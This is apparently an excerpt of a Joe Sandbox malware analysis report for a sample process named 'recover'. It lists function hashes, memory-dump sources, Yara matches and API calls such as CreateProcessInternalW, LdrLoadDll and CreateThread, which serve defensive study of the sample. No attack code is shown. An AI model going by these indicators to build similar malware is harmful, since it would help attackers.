                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b1482f8eb6913c4d68f59a74fab97e4976e647e198e2818e2d8446a06440bfdb
                                                  • Instruction ID: 4aee08b38c5292a68dcedade9ba2f6b520a9fe76b0acc18469d3a6998c6f55f2
                                                  • Opcode Fuzzy Hash: b1482f8eb6913c4d68f59a74fab97e4976e647e198e2818e2d8446a06440bfdb
                                                  • Instruction Fuzzy Hash: D590023521144C02D1C0B159440464A0005C7E1301F95C01AA0025A54DCB178B5977A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: dba21a004e4c367b19cf5d8cd1adc57ba913ac66894abb8abc22ac111762a21f
                                                  • Instruction ID: fc6b4e8a745aaa074a5e03aad7a561231310bb6fa2572bba7574680ce270c2dc
                                                  • Opcode Fuzzy Hash: dba21a004e4c367b19cf5d8cd1adc57ba913ac66894abb8abc22ac111762a21f
                                                  • Instruction Fuzzy Hash: 7090023561544C02D190B15944147460005C7E0301F55C016A0024A54D87578B5576A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 447ac8ec10b720eb5c0152ab1f878957140b6b25f8ecc5562580064a7af9e052
                                                  • Instruction ID: 6f24375ad71b8bb09f5621e4411e987967ad88284b8751e1ed4a74e38ed25cda
                                                  • Opcode Fuzzy Hash: 447ac8ec10b720eb5c0152ab1f878957140b6b25f8ecc5562580064a7af9e052
                                                  • Instruction Fuzzy Hash: 7990043D331444030145F55D07045070047C7F5351355C037F1015D50CD733CD715135
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: fc6cc4bda772e891550ea19ceccd6f75bbd7bd0015cb652df3eab438ba8cffd6
                                                  • Instruction ID: a4d29bf28d3fbb100ce53a1a73fea5c5178d01811af8add5d67bd750196b01f5
                                                  • Opcode Fuzzy Hash: fc6cc4bda772e891550ea19ceccd6f75bbd7bd0015cb652df3eab438ba8cffd6
                                                  • Instruction Fuzzy Hash: C8900229231444020185F559060450B0445D7E6351395C01AF1416990CC72389655325
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0562bb867efaad0d7d6b9c07eebb21b1a376b1025bc683bf5f376a1f813f15cd
                                                  • Instruction ID: 10e5c2c9214db14201303b3ac6f5146841dfd0329df7cc94a5758dbdb4fade97
                                                  • Opcode Fuzzy Hash: 0562bb867efaad0d7d6b9c07eebb21b1a376b1025bc683bf5f376a1f813f15cd
                                                  • Instruction Fuzzy Hash: 3090022525549502D190B15D44046164005E7F0201F55C026A0814994D875789556225
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 37ba4614777b7fd9514edec7783b28ac0d1a782a49119cf4dfcdfb0207c97161
                                                  • Instruction ID: dce5be06f6cb8f0a850e932ba6e3aefcd5b80adb36bf84b21f4b1116e7e66232
                                                  • Opcode Fuzzy Hash: 37ba4614777b7fd9514edec7783b28ac0d1a782a49119cf4dfcdfb0207c97161
                                                  • Instruction Fuzzy Hash: 8C90026535144842D140B1594414B060005C7F1301F55C01AE1064954D871BCD52612A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 333a0bf87c430d8cf079d8ac889b574ff1f6670af8f15424e7837949529a8d5e
                                                  • Instruction ID: 2d6f5d2218bb898cab503d7c68505ad8d4a5a849be27ba0430a836edc195ea44
                                                  • Opcode Fuzzy Hash: 333a0bf87c430d8cf079d8ac889b574ff1f6670af8f15424e7837949529a8d5e
                                                  • Instruction Fuzzy Hash: 1F900225221C4442D240B5694C14B070005C7E0303F55C11AA0154954CCB1789615525
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3b22df54d4ca36482c57f85ce75d80f0f197b08e2a8bf0d10273ce6a52a41c2f
                                                  • Instruction ID: 1a54008958dfa26193d1899c51ee1ef68a72d9a2de874db22dc53bc8cee1ed02
                                                  • Opcode Fuzzy Hash: 3b22df54d4ca36482c57f85ce75d80f0f197b08e2a8bf0d10273ce6a52a41c2f
                                                  • Instruction Fuzzy Hash: 7B900225611444424180B16988449064005EBF1211755C126A0998950D875B89655669
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: bfccf9f350708c5971f7bcf0dd7e247cced89c6e3a08914fcafdb617e5e277c0
                                                  • Instruction ID: 041634e139c5cab3de8ae4913ee766603494fc3b783c4831d3b175ffca5ca1d5
                                                  • Opcode Fuzzy Hash: bfccf9f350708c5971f7bcf0dd7e247cced89c6e3a08914fcafdb617e5e277c0
                                                  • Instruction Fuzzy Hash: 1D90026521184803D180B55948046070005C7E0302F55C016A2064955E8B2B8D516139
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: af2c39af585021cc70410ee39c70c6edd0d3fe39b2d8a1ef1d9f2c659dfa5bde
                                                  • Instruction ID: e21eca0d4752df6d6161d5782362c25d02341f375356c4944dda8c8134a5924d
                                                  • Opcode Fuzzy Hash: af2c39af585021cc70410ee39c70c6edd0d3fe39b2d8a1ef1d9f2c659dfa5bde
                                                  • Instruction Fuzzy Hash: 5B90022561144902D141B1594404616000AC7E0241F95C027A1024955ECB278A92A135
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1afb4e4fba97b0ac207e31fa4ae1ba3bcaa016683153239fa2455f2bcef14d1d
                                                  • Instruction ID: e1e824288879f9cd2d12d69655da92df1a9f825a218fc2f6d00371daf561d3bf
                                                  • Opcode Fuzzy Hash: 1afb4e4fba97b0ac207e31fa4ae1ba3bcaa016683153239fa2455f2bcef14d1d
                                                  • Instruction Fuzzy Hash: 9490022D22344402D1C0B159540860A0005C7E1202F95D41AA0015958CCB1789695325
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5036b8d2a47235b83bc94b0163797dff50e1300246bb884b8dcc196cd206e1fe
                                                  • Instruction ID: 89eaacf229ae0ce3f9aecbb02c0efdcfb0e906512239e0c4db40f83ad58f257c
                                                  • Opcode Fuzzy Hash: 5036b8d2a47235b83bc94b0163797dff50e1300246bb884b8dcc196cd206e1fe
                                                  • Instruction Fuzzy Hash: EE90022531144403D180B15954186064005D7F1301F55D016E0414954CDB1789565226
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 53e161bb0a48c08b4d1b44cc7b19931d9c2d7ebfbaa9306653c8b25a34f51fe2
                                                  • Instruction ID: a1a31829abce683e936ea4c30c4f1344a54f9e838fafdee7d03802f7d6f348c6
                                                  • Opcode Fuzzy Hash: 53e161bb0a48c08b4d1b44cc7b19931d9c2d7ebfbaa9306653c8b25a34f51fe2
                                                  • Instruction Fuzzy Hash: 7A900225252485525585F15944045074006D7F0241795C017A1414D50C87279956D625
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ede3a2d587cb943c9279b8dd9738bd88b6ce98162e313cf865354d8376c11fc4
                                                  • Instruction ID: a4e260661a36aba86f445ee23974bde7726213d14343bdb8584a0ea45ef802af
                                                  • Opcode Fuzzy Hash: ede3a2d587cb943c9279b8dd9738bd88b6ce98162e313cf865354d8376c11fc4
                                                  • Instruction Fuzzy Hash: 9190023521144813D151B15945047070009C7E0241F95C417A0424958D97578A52A125
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0474e163318d360e3a18945e30eb52afc7722b138baa8edf469b3ce6ba124c2e
                                                  • Instruction ID: 2412f3e4a833719adb06dbcdc10516f737038cdffdd703ce412d2264be374f12
                                                  • Opcode Fuzzy Hash: 0474e163318d360e3a18945e30eb52afc7722b138baa8edf469b3ce6ba124c2e
                                                  • Instruction Fuzzy Hash: 5190023521144C42D140B1594404B460005C7F0301F55C01BA0124A54D8717C9517525
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: e882d53a7a4e29e3deef7289567567da24d48cd6c7b8b238de19f17c566a3a1c
                                                  • Instruction ID: 17a2c0e10632d32c2f24dea09099ca702feb8effe5293dab8d8e62103f8c2966
                                                  • Opcode Fuzzy Hash: e882d53a7a4e29e3deef7289567567da24d48cd6c7b8b238de19f17c566a3a1c
                                                  • Instruction Fuzzy Hash: 139002352114CC02D150B159840474A0005C7E0301F59C416A4424A58D879789917125
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 66108b65c9ea447d41799176ed0b92b1ed790e4b27176d5524e8415a69232d23
                                                  • Instruction ID: 940224d90e359e3da0d3990cde265a35c0834b0ecc3b743fc23fe639f8c7e286
                                                  • Opcode Fuzzy Hash: 66108b65c9ea447d41799176ed0b92b1ed790e4b27176d5524e8415a69232d23
                                                  • Instruction Fuzzy Hash: 1990023521144802D140B59954086460005C7F0301F55D016A5024955EC76789916135
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • PostThreadMessageW.USER32(424iy8O9X8,00000111,00000000,00000000), ref: 02D0037D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: 424iy8O9X8$424iy8O9X8
                                                  • API String ID: 1836367815-1727522845
                                                  • Opcode ID: ef57a1f114697bfc0fc347bde78f56bc0f7024c95fc9b86b3a4f82076caf0915
                                                  • Instruction ID: fce19386469bd141fdd8459824eac6b3c312d883458f0726c12c7c4fc15c4235
                                                  • Opcode Fuzzy Hash: ef57a1f114697bfc0fc347bde78f56bc0f7024c95fc9b86b3a4f82076caf0915
                                                  • Instruction Fuzzy Hash: 1C11A731E4529876EB1196A49C41FDFBB7CDF41B50F048095FE047B2C1E6A45A06CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • PostThreadMessageW.USER32(424iy8O9X8,00000111,00000000,00000000), ref: 02D0037D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: 424iy8O9X8$424iy8O9X8
                                                  • API String ID: 1836367815-1727522845
                                                  • Opcode ID: 2f1abe6b01a288f19498868f0712ff1e353ab1044d8a56a143436861197acd59
                                                  • Instruction ID: 7922bf496e4b83a7fad82bd9ad1acaac4dd5a8f9794814ce0c0f07beb5c81228
                                                  • Opcode Fuzzy Hash: 2f1abe6b01a288f19498868f0712ff1e353ab1044d8a56a143436861197acd59
                                                  • Instruction Fuzzy Hash: 90018031D41258B6EB21A6A48C42FDF7B7CDF81B50F058055FA047B2C0E6B46A06CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 02D1247B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: 22b027e778b2bc0e83bfcda6eef6e6ae06335021785c2a5b6b8ad7da80e41953
                                                  • Instruction ID: a45c9ca4c971da0f24155d4e1cd67f48d658870ab8f614414c770aa2b14fd5cf
                                                  • Opcode Fuzzy Hash: 22b027e778b2bc0e83bfcda6eef6e6ae06335021785c2a5b6b8ad7da80e41953
                                                  • Instruction Fuzzy Hash: A6316AB1605304BBC724DF64E884FE6BBB9EF88704F00852DEA5D5B741D770AA44CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 02D0E467
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID: @J7<
                                                  • API String ID: 2538663250-2016760708
                                                  • Opcode ID: 23e7c56de78823da27b328ba62f9b0eaddd0ad050b8fcd600bd2d574cce0ce4c
                                                  • Instruction ID: 4d869093446930ffc612daf5715cf76b4ad6834e8cd76a80fb7ec3461985e310
                                                  • Opcode Fuzzy Hash: 23e7c56de78823da27b328ba62f9b0eaddd0ad050b8fcd600bd2d574cce0ce4c
                                                  • Instruction Fuzzy Hash: 99313DB5A0020AAFDB00DFD8D8809EEB7B9FF88304F108959E515AB354D775EE05CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 02D0E467
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID: @J7<
                                                  • API String ID: 2538663250-2016760708
                                                  • Opcode ID: a3297611e17c88f50d1f8c6d6c807e55ffda7c09a366022e5947cb1ad26e56bd
                                                  • Instruction ID: 001c6b83ec6c46dabb7dc6b19eeb24f6fd6c80f99552aa1a1e75bf793786007a
                                                  • Opcode Fuzzy Hash: a3297611e17c88f50d1f8c6d6c807e55ffda7c09a366022e5947cb1ad26e56bd
                                                  • Instruction Fuzzy Hash: A9312FB5A0060AAFDB00DFD8D8809EEB7B9FF88304F108959E515AB354D775EE05CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02D03D32
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                                  • Instruction ID: a535775e1c7e64fd324f2b9a75d1da808ee3ed1fafc6ba0a4ee26b9754713c3e
                                                  • Opcode Fuzzy Hash: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                                  • Instruction Fuzzy Hash: D8011EB5E0020DBBDF10DAE4EC81FDEB7B99B54318F004595E90897681F631EB54CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(02D007B1,02D007D9,02D005B1,00000000,02D07593,00000010,02D007D9,?,?,00000044,02D007D9,00000010,02D07593,00000000,02D005B1,02D007D9), ref: 02D17C7D
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 5b20db7e92e533c626f26659f6f6110382f2d83d3cab121cfaf77c103d0d43e8
                                                  • Instruction ID: 3b344fa4d4898c8648ce959ed7956780c42b36d3ddc138081d500e98cdf5416e
                                                  • Opcode Fuzzy Hash: 5b20db7e92e533c626f26659f6f6110382f2d83d3cab121cfaf77c103d0d43e8
                                                  • Instruction Fuzzy Hash: EF0180B2214508BBDB44DF99DC80EEB77ADAF8C754F418208BA0DE7241D670F9518BA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02CF9315
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: 71de68df7c040c8c85c582e4a4bbb631f25a80a590d1c423bc508ff426e65506
                                                  • Instruction ID: 648ff8e9fc00cac8c938b24551b800850835146e38986c210d33d729fa94cab6
                                                  • Opcode Fuzzy Hash: 71de68df7c040c8c85c582e4a4bbb631f25a80a590d1c423bc508ff426e65506
                                                  • Instruction Fuzzy Hash: CFF06D7338031437E66175A9AC02FDBB68DDB84B61F140025FB0DEB2C0DAA2B9418AA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02CF9315
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
